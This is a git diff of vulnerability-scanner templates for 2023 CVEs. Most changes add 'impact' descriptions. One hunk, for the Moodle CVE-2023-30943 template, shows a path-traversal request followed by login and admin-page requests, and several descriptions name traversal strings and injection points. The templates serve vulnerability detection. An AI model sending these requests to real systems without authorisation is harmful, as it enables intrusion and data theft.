https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587 
diff --git a/http/cves/2023/CVE-2023-2766.yaml b/http/cves/2023/CVE-2023-2766.yaml index bb9dc4c5e7..a50ece0442 100644 --- a/http/cves/2023/CVE-2023-2766.yaml +++ b/http/cves/2023/CVE-2023-2766.yaml @@ -6,17 +6,19 @@ info: severity: high description: | A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. reference: - https://github.com/8079048q/cve/blob/main/weaveroa.md - https://nvd.nist.gov/vuln/detail/CVE-2023-2766 classification: - cve-id: CVE-2023-2766 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 + cve-id: CVE-2023-2766 cwe-id: CWE-552 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="泛微-EOffice" tags: cve,cve2023,weaver,eoffice,exposure diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 787ba35001..d0f1ce457b 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.3.1. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.3.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 4826ae4018..7e33ba0cbc 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id. + impact: | + Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events. remediation: Fixed in version 2.1.2 reference: - https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 00fd25b09b..1447290c80 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated. + impact: | + An attacker can gain unauthorized access to the WooCommerce Payments admin panel, potentially leading to data theft or modification. remediation: | Update to the latest version of the WooCommerce Payments plugin to fix the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-2813.yaml b/http/cves/2023/CVE-2023-2813.yaml index ad3c1583ff..4738d6c485 100644 --- a/http/cves/2023/CVE-2023-2813.yaml +++ b/http/cves/2023/CVE-2023-2813.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | All of the above Aapna WordPress theme through 1.3, Anand WordPress theme through 1.2, Anfaust WordPress theme through 1.1, Arendelle WordPress theme before 1.1.13, Atlast Business WordPress theme through 1.5.8.5, Bazaar Lite WordPress theme before 1.8.6, Brain Power WordPress theme through 1.2, BunnyPressLite WordPress theme before 2.1, Cafe Bistro WordPress theme before 1.1.4, College WordPress theme before 1.5.1, Connections Reloaded WordPress theme through 3.1, Counterpoint WordPress theme through 1.8.1, Digitally WordPress theme through 1.0.8, Directory WordPress theme before 3.0.2, Drop WordPress theme before 1.22, Everse WordPress theme before 1.2.4, Fashionable Store WordPress theme through 1.3.4, Fullbase WordPress theme before 1.2.1, Ilex WordPress theme before 1.4.2, Js O3 Lite WordPress theme through 1.5.8.2, Js Paper WordPress theme through 2.5.7, Kata WordPress theme before 1.2.9, Kata App WordPress theme through 1.0.5, Kata Business WordPress theme through 1.0.2, Looki Lite WordPress theme before 1.3.0, moseter WordPress theme through 1.3.1, Nokke WordPress theme before 1.2.4, Nothing Personal WordPress theme through 1.0.7, Offset Writing WordPress theme through 1.2, Opor Ayam WordPress theme through 18, Pinzolo WordPress theme before 1.2.10, Plato WordPress theme before 1.1.9, Polka Dots WordPress theme through 1.2, Purity Of Soul WordPress theme through 1.9, Restaurant PT WordPress theme before 1.1.3, Saul WordPress theme before 1.1.0, Sean Lite WordPress theme before 1.4.6, Tantyyellow WordPress theme through 1.0.0.5, TIJAJI WordPress theme through 1.43, Tiki Time WordPress theme through 1.3, Tuaug4 WordPress theme through 1.4, Tydskrif WordPress theme through 1.1.3, UltraLight WordPress theme through 1.2, Venice Lite WordPress theme before 1.5.5, Viala WordPress theme through 1.3.1, viburno WordPress theme before 1.3.2, Wedding Bride WordPress theme before 1.0.2, Wlow WordPress theme before 
1.2.7 suffer from the same issue about the search box reflecting the results causing XSS which allows an unauthenticated attacker to exploit against users if they click a malicious link. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. reference: - https://wpscan.com/vulnerability/f434afd3-7de4-4bf4-a9bb-9f9aeaae1dc5 - https://nvd.nist.gov/vuln/detail/CVE-2023-2813 @@ -21,7 +23,6 @@ info: verified: true max-request: 1 tags: cve,cve2023,wordpress,wp-theme,xss - variables: str: "{{rand_base(6)}}" random: "{{rand_base(3)}}" diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 932a03b839..03708ed121 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability was found in Ellucian Ethos Identity up to 5.10.5. It has been classified as problematic. Affected is an unknown function of the file /cas/logout. The manipulation of the argument url leads to cross site scripting. It is possible to launch the attack remotely. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrading to version 5.10.6 is able to address this issue. It is recommended to upgrade the affected component. reference: - https://medium.com/@cyberninja717/685bb1675dfb diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 4ff61dd6be..ead6d43517 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index 9026ff090f..9a2acdf6a8 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -6,6 +6,8 @@ info: severity: high description: | MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. + impact: | + An attacker can gain unauthorized access to sensitive information stored in the MinIO cluster. remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. reference: - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml index 86adba6269..6b11027be3 100644 --- a/http/cves/2023/CVE-2023-28665.yaml +++ b/http/cves/2023/CVE-2023-28665.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 2.2.2 reference: - https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036 diff --git a/http/cves/2023/CVE-2023-29084.yaml b/http/cves/2023/CVE-2023-29084.yaml index 5eee45ba49..a5d791f8c2 100644 --- a/http/cves/2023/CVE-2023-29084.yaml +++ b/http/cves/2023/CVE-2023-29084.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, unauthorized access to sensitive information, or complete compromise of the target system. remediation: | Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus. reference: diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index f69c4aba97..298069d93c 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass access controls and gain unauthorized access to sensitive information or perform unauthorized actions. remediation: | Apply the latest security patches or updates provided by Adobe to fix the access control bypass vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 3aa911b0d6..c7643489f4 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to Adobe ColdFusion version 2023.0.0.328155 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index e69c3c0787..f1d8532b58 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by cPanel to fix this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index 2c9d2a3bbc..bf88b50293 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index 42da7244c4..f1f9058e9a 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: 
diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 7fd524f6ea..66a8042d72 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5. + impact: | + An attacker can gain unauthorized access to user accounts, potentially leading to data theft, privilege escalation, or other malicious activities. remediation: Fixed in version 7.6.5 reference: - https://lana.codes/lanavdb/2326f41f-a39f-4fde-8627-9d29fff91443/ diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 1a06661227..49a8e2a9e2 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the server. remediation: | Upgrade to a patched version of Nuovo Spreadsheet Reader or apply the vendor-provided fix to mitigate the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index d6d1fa0d30..88a9ae5617 100644 --- a/http/cves/2023/CVE-2023-29919.yaml 
+++ b/http/cves/2023/CVE-2023-29919.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 7b86186c98..01d483faea 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application. remediation: | Apply the latest security patch or upgrade to a patched version of PowerJob V4.3.1. reference: diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index c91626851e..1f0b0024fc 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade PowerJob to a version higher than 4.3.2 or apply the necessary patches to fix the authentication bypass issue. reference: diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index bf348873df..0055ee600f 100644 --- a/http/cves/2023/CVE-2023-30019.yaml 
+++ b/http/cves/2023/CVE-2023-30019.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | imgproxy <=3.14.0 is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of sanitization of the imageURL parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution. remediation: | Upgrade to a version of Imgproxy that is not affected by this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index df2f859cb3..4fba0cd594 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | PrestaShop leocustomajax 1.0 and 1.0.0 are vulnerable to SQL Injection via modules/leocustomajax/leoajax.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database. remediation: | Apply the latest security patch or upgrade to a patched version of PrestaShop leocustomajax plugin to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index d9f15d94de..d221f94d70 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability. reference: 
diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 8e53c11708..d94e9487c7 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 493fc87c27..335910e7c8 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index c7eb3543bb..d40bfc5927 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 6.1.6. reference: - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 4861eadc9a..1b949bf676 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel. + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential compromise of the Moodle application and its users. reference: - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu - https://nvd.nist.gov/vuln/detail/CVE-2023-30943 @@ -25,24 +27,22 @@ http: GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | GET /login/index.php HTTP/2 Host: {{Hostname}} - - | POST /login/index.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded anchor=&logintoken={{token}}&username={{username}}&password={{password}} - - | GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1 Host: {{Hostname}} host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 8dae9091af..edfbdad248 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php. + impact: | + An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Repetier Server. reference: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 99e24d0a7f..d4c37f8ad1 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml index e426d8e267..b6b93e1615 100644 --- a/http/cves/2023/CVE-2023-32117.yaml +++ b/http/cves/2023/CVE-2023-32117.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. + impact: | + Unauthenticated attackers can access and manipulate sensitive data in Google Drive remediation: Fixed in 1.2.0 reference: - https://github.com/RandomRobbieBF/CVE-2023-32117 diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 8a3b9810df..da5a42a116 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js. + impact: | + An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Fixed in version 5.42.1 reference: - https://github.com/advisories/GHSA-wf7x-fh6w-34r6 diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index a0d64051fb..e10f5b2f77 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. + impact: | + An attacker can gain unauthorized access to user accounts and potentially take control of the affected WordPress website. remediation: | Update WordPress Elementor Lite plugin to the latest version (5.7.2) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 2959d97e70..83a44e8761 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to the Openfire Administration Console. remediation: | The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice. reference: 
diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index c0b54eaa85..ba3b26dfc6 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: An unauthenticated attacker could achieve the code execution through a RemoteControl server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Ivanti to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 0eec105508..d51e1ddfd6 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Old Age Home Management System v1.0. reference: diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 16238a47b5..7648971278 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id= + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: 
diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index cad0838805..cf91701f49 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 9eccb01be5..caa2ebae3b 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints. + impact: | + An attacker can gain unauthorized access to sensitive information. remediation: | Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index e3c5c2d336..f516a0fe85 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat. reference: 
diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index e5c6254c3a..1f87746a07 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists. + impact: | + The attacker can access and steal sensitive information from the contacts database, potentially leading to data breaches and privacy violations. remediation: | Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index bc1c14d998..77e30c55bd 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The authentication mechanism in SonicWall GMS and Analytics Web Services 